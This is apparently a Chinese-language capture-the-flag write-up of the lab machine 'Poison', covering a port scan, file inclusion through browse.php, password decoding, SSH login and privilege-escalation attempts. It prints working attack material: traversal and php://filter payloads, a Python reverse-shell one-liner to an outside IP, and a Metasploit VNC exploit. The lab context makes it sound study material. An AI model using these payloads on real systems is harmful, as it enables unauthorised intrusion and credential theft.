Poison(文件包含+端口转发)

1. 端口扫描

ip: 10.10.10.84

1
2
3
4
5
6
7
22/tcp   open  ssh
80/tcp   open  http
5802/tcp open  vnc-http-2
5902/tcp open  vnc-2
5903/tcp open  vnc-3
6002/tcp open  X11:2
6003/tcp open  X11:3

嗯,确认是linux系统

2. web探测

2 一看到浏览器上的URL:file=xxx,就富有职业精神的输入../../../../../etc/passwd

啊哈~一个文件包含

Info1——机器上普通用户名称: hast::845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin nobody::65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin _tss::601:601:TrouSerS user:/var/empty:/usr/sbin/nologin messagebus::556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin avahi::558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin charix::1001:1001:charix:/home/charix:/bin/csh

运行:http://10.10.10.84/browse.php?file=php://filter/convert.base64-encode/resource=config.php

Info2——文件路径: Warning: include(php://filter/convert.base64-encode/resource=config.php): failed to open stream: operation failed in /usr/local/www/apache24/data/browse.php on line 2 Warning: include(): Failed opening ‘php://filter/convert.base64-encode/resource=config.php’ for inclusion (include_path=’.:/usr/local/www/apache24/data’) in /usr/local/www/apache24/data/browse.php on line 2

于是用php协议,访问browse.php,用hackbar解码一下。 4 本来想用dirbuster扫描下存在的文件,再用文件包括去查看敏感文件。。。 但是,这个实验中,主页面上有一个listfiles.php,访问以后,直接指出了一个pwdbackup.txt。

5 上面说这个密码很安全,它被加密了13次。真的还能出什么问题。 然后我一看,我去,base64编码还好意思说安全,加密13次又有什么意义吗? 我还是太菜,手动把密文的\n去掉,然后再解码,很多次解码后,密码为:Charix!2#4%6&8(0

方法二: sed -i ‘s/\n//g’ pwdbackup.txt

Info3——口令 Charix!2#4%6&8(0

  • Trying: ssh charix@10.10.10.84

charix/Charix!2#4%6&8(0 ssh登陆成功 6

3.提权

/home/charix目录下有三个文件,一个flag;一个secret,是空文件;还有一个secret.zip。 那么需要解压一下,tar -zxvf secret.zip 提示x secretEnter passphrase: 那么需要输入密码,然后尝试错误密码,会反复提示Enter passphrase。 通过Info3口令,成功解压。 解压后是secret文件,类型为:secret: Non-ISO extended-ASCII text, with no line terminators

用cat secret,显示为乱码。

vi secret

  • sudo、gcc———–>command not found
  • su ——> Sorry
  • uname -a查看内核版本,应该不是内核漏洞提权。
    1
    FreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE #0 r321309: Fri Jul 21 02:08:28 UTC 2017     root@releng2.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC  amd64
    
  • nc -l 999 ——-> nc: Permission denied

  • Trying(SUID提权,参考)。 find / -user root -perm -4000 -exec ls -ldb {} \; 执行结果中,没有namp、vim、find等等可以提权的程序。

有意思的是,在连接过程中,ssh命令面板突然不灵了,无法输入任何命令。 重新连进去以后,我的readme.txt多了一行。。。看来遇到同道中人了。

  • Trying:测试nc,用服务端连接kali。成功连接。

不是吧。。又连不上了,第一次遇到被人挤下线。

查看一下进程这些都是远程连进来的。。。

  • Trying:太卡了,弹一个python shell。 本地:nc -lvp 1234 服务器:python ‐c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.198",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","‐i"]);'

  • Trying : python -m SimpleHTTPServer 888
    1
    2
    3
    4
    5
    Traceback (most recent call last):
    File "/usr/local/lib/python2.7/runpy.py", line 174, in _run_module_as_main
      "__main__", fname, loader, pkg_name)
     。。。此处省略几十行
    socket.error: [Errno 13] Permission denied
    
  • Trying:

找到网站所在目录

3权限不够

  • Trying: 尝试vnc远程命令执行 查看开放端口

netstat

尝试vnc远程命令执行

1
2
3
use exploit/multi/vnc/vnc_keyboard_exec
set RHOST
set PASSWORD

试了好多密码,包括里面secret文件。失败

2018.9.28.总结

writeup参考

SSH原理与运用(二):远程操作与端口转发 01

通过绑定本地和远程的端口,就可以用vncviewer命令,使用密钥,开启vnc窗口 vncviewer -passwd secret 127.0.0.1:5901